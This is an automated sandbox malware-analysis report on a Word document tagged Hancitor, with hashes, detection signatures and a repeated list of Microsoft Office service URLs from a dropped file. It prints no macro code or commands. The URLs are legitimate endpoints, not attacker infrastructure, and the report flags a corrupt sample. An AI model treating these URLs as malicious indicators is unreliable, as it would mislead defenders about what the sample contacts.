Loading ...

Play interactive tourEdit tour

Analysis Report 1118_8732615.doc

Overview

General Information

Sample Name:1118_8732615.doc
Analysis ID:319766
MD5:0f75ad40daec01aee7642795cc544bb3
SHA1:76334ccc6e92d579495671de47664180517cdf05
SHA256:afba9deb16b5100c5964ca33cd42c2aa6b972ad104efd3d58e0ad8b7070cd5f4
Tags:docHancitormacros

Most interesting Screenshot:

Errors
  • Corrupt sample or wrongly selected analyzer.

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Yara detected hidden Macro 4.0 in Excel
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 2440 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
1118_8732615.docJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: 1118_8732615.docVirustotal: Detection: 15%Perma Link
    Source: 1118_8732615.docReversingLabs: Detection: 12%
    Source: 1118_8732615.docVirustotal: Detection: 15%Perma Link
    Source: 1118_8732615.docReversingLabs: Detection: 12%
    Machine Learning detection for sampleShow sources
    Source: 1118_8732615.docJoe Sandbox ML: detected
    Source: 1118_8732615.docJoe Sandbox ML: detected
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.office.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.onedrive.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://augloop.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.entity.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cortana.ai
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cr.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://directory.services.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.windows.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.windows.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows.local
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://management.azure.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://management.azure.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://messaging.office.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officeapps.live.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://settings.outlook.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://tasks.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.office.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.onedrive.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://augloop.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.entity.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cortana.ai
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://cr.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://directory.services.
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 3EBA6D72-689F-46F1-A58C-F50E3BD4CDEC.0.drString found in binary or memory: https://graph.windows.net
